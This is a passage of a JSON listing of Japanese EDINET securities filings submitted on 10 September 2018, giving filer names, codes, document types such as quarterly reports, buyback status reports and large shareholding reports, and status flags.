"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 164,
"docID": "S100E301",
"edinetCode": "E05680",
"secCode": "38430",
"JCN": "8011001034292",
"filerName": "フリービット株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:44",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 165,
"docID": "S100E2TM",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "015",
"formCode": "010000",
"docTypeCode": "235",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:47",
"docDescription": "内部統制報告書-第1期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 166,
"docID": "S100E2TD",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:48",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 167,
"docID": "S100E303",
"edinetCode": "E34326",
"secCode": null,
"JCN": "3010001193533",
"filerName": "XTech HP株式会社",
"fundCode": null,
"ordinanceCode": "040",
"formCode": "020000",
"docTypeCode": "240",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:50",
"docDescription": "公開買付届出書",
"issuerEdinetCode": null,
"subjectEdinetCode": "E05431",
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 168,
"docID": "S100E2VG",
"edinetCode": "E02439",
"secCode": "78780",
"JCN": "8090001004562",
"filerName": "株式会社光・彩",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 11:13",
"docDescription": "四半期報告書-第52期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 169,
"docID": "S100E267",
"edinetCode": "E02439",
"secCode": "78780",
"JCN": "8090001004562",
"filerName": "株式会社光・彩",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:13",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 170,
"docID": "S100E2ZQ",
"edinetCode": "E22350",
"secCode": null,
"JCN": "8240001000414",
"filerName": "株式会社足利興産",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:14",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E00480",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DVEA",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 171,
"docID": "S100E30H",
"edinetCode": "E05431",
"secCode": null,
"JCN": "7010401089880",
"filerName": "エキサイト株式会社",
"fundCode": null,
"ordinanceCode": "040",
"formCode": "040000",
"docTypeCode": "290",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:24",
"docDescription": "意見表明報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": "E34326",
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E303",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 172,
"docID": "S100E312",
"edinetCode": "E02688",
"secCode": "80860",
"JCN": "8120001068678",
"filerName": "ニプロ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:34",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 173,
"docID": "S100E31A",
"edinetCode": "E05209",
"secCode": "42950",
"JCN": "3130001022300",
"filerName": "株式会社フェイス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:46",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 174,
"docID": "S100E319",
"edinetCode": "E26579",
"secCode": "31740",
"JCN": "4040001063955",
"filerName": "株式会社ハピネス・アンド・ディ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:47",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 175,
"docID": "S100E31H",
"edinetCode": "E05704",
"secCode": "21590",
"JCN": "4011001041672",
"filerName": "株式会社フルスピード",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 11:53",
"docDescription": "四半期報告書-第19期第1四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 176,
"docID": "S100E31I",
"edinetCode": "E05704",
"secCode": "21590",
"JCN": "4011001041672",
"filerName": "株式会社フルスピード",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 11:54",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 177,
"docID": "S100E30X",
"edinetCode": "E23250",
"secCode": "87140",
"JCN": "1120001140303",
"filerName": "株式会社池田泉州ホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 12:25",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 178,
"docID": "S100E2SF",
"edinetCode": "E00208",
"secCode": "97430",
"JCN": "3010501007440",
"filerName": "株式会社丹青社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 13:19",
"docDescription": "四半期報告書-第61期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 179,
"docID": "S100E2UQ",
"edinetCode": "E02055",
"secCode": "67970",
"JCN": "7180001020428",
"filerName": "名古屋電機工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:20",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 180,
"docID": "S100E2SM",
"edinetCode": "E00208",
"secCode": "97430",
"JCN": "3010501007440",
"filerName": "株式会社丹青社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:22",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 181,
"docID": "S100E1C2",
"edinetCode": "E05304",
"secCode": "23270",
"JCN": "9010001045803",
"filerName": "日鉄ソリューションズ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:24",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 182,
"docID": "S100E2UY",
"edinetCode": "E04367",
"secCode": null,
"JCN": "9040001044645",
"filerName": "成田国際空港株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:25",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 183,
"docID": "S100E32Z",
"edinetCode": "E01190",
"secCode": "52140",
"JCN": "4160001001498",
"filerName": "日本電気硝子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 184,
"docID": "S100E1BG",
"edinetCode": "E05861",
"secCode": null,
"JCN": null,
"filerName": "ビー・エヌ・ピー・パリバ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "150003",
"docTypeCode": "100",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:28",
"docDescription": "発行登録追補書類",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CHJC",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 185,
"docID": "S100E2VC",
"edinetCode": "E00717",
"secCode": "94740",
"JCN": "5290801002046",
"filerName": "株式会社ゼンリン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:30",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 186,
"docID": "S100E2TY",
"edinetCode": "E05355",
"secCode": null,
"JCN": "8010401005011",
"filerName": "NTTファイナンス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:31",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 187,
"docID": "S100E33F",
"edinetCode": "E01137",
"secCode": "53330",
"JCN": "3180001010829",
"filerName": "日本碍子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "110000",
"docTypeCode": "080",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:43",
"docDescription": "発行登録書(株券、社債券等)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 188,
"docID": "S100E2WQ",
"edinetCode": "E24826",
"secCode": null,
"JCN": "3120001146521",
"filerName": "株式会社A&A planning",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:43",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03145",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 189,
"docID": "S100E2WR",
"edinetCode": "E34391",
"secCode": null,
"JCN": "2120001215723",
"filerName": "株式会社MUKUMOTO",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:46",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E03145",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 190,
"docID": "S100E330",
"edinetCode": "E01794",
"secCode": "67730",
"JCN": "1020001086473",
"filerName": "パイオニア株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:48",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第19号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 191,
"docID": "S100E2Y9",
"edinetCode": "E30598",
"secCode": "32970",
"JCN": "2250001005979",
"filerName": "株式会社東武住販",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030001",
"docTypeCode": "130",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:51",
"docDescription": "訂正有価証券報告書-第35期(平成29年6月1日-平成30年5月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1BM",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 192,
"docID": "S100E33O",
"edinetCode": "E30598",
"secCode": "32970",
"JCN": "2250001005979",
"filerName": "株式会社東武住販",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042100",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 13:57",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2Y9",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 193,
"docID": "S100E33S",
"edinetCode": "E00008",
"secCode": "13790",
"JCN": "6100001003151",
"filerName": "ホクト株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:06",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 194,
"docID": "S100E33I",
"edinetCode": "E03810",
"secCode": null,
"JCN": "6010001074037",
"filerName": "野村證券株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:07",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E24073",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 195,
"docID": "S100E345",
"edinetCode": "E01003",
"secCode": "41850",
"JCN": "6010401082746",
"filerName": "JSR株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 196,
"docID": "S100E2TN",
"edinetCode": "E02570",
"secCode": "80770",
"JCN": "7120001048994",
"filerName": "小林産業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 197,
"docID": "S100E34I",
"edinetCode": "E05699",
"secCode": "38530",
"JCN": "2010701012175",
"filerName": "アステリア株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 14:55",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 198,
"docID": "S100E2BX",
"edinetCode": "E32761",
"secCode": null,
"JCN": null,
"filerName": "北山 雅一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32619",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 199,
"docID": "S100E34E",
"edinetCode": "E34285",
"secCode": "34960",
"JCN": "9011001062508",
"filerName": "株式会社アズーム",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "024001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "訂正有価証券届出書(新規公開時)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DYI0",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 200,
"docID": "S100E2XY",
"edinetCode": "E32395",
"secCode": null,
"JCN": null,
"filerName": "VIS Advisors,LP",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E30126",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 201,
"docID": "S100E348",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "024001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:00",
"docDescription": "訂正有価証券届出書(新規公開時)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DZJX",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 202,
"docID": "S100E2C4",
"edinetCode": "E32760",
"secCode": null,
"JCN": "2120003011600",
"filerName": "合同会社フィンテックマネジメント",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32619",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 203,
"docID": "S100E2IX",
"edinetCode": "E04499",
"secCode": "95030",
"JCN": "3120001059632",
"filerName": "関西電力株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03946",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 204,
"docID": "S100E349",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "020001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:01",
"docDescription": "訂正有価証券届出書(通常方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DZKG",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 205,
"docID": "S100E34B",
"edinetCode": "E02767",
"secCode": "36120",
"JCN": "4140001024328",
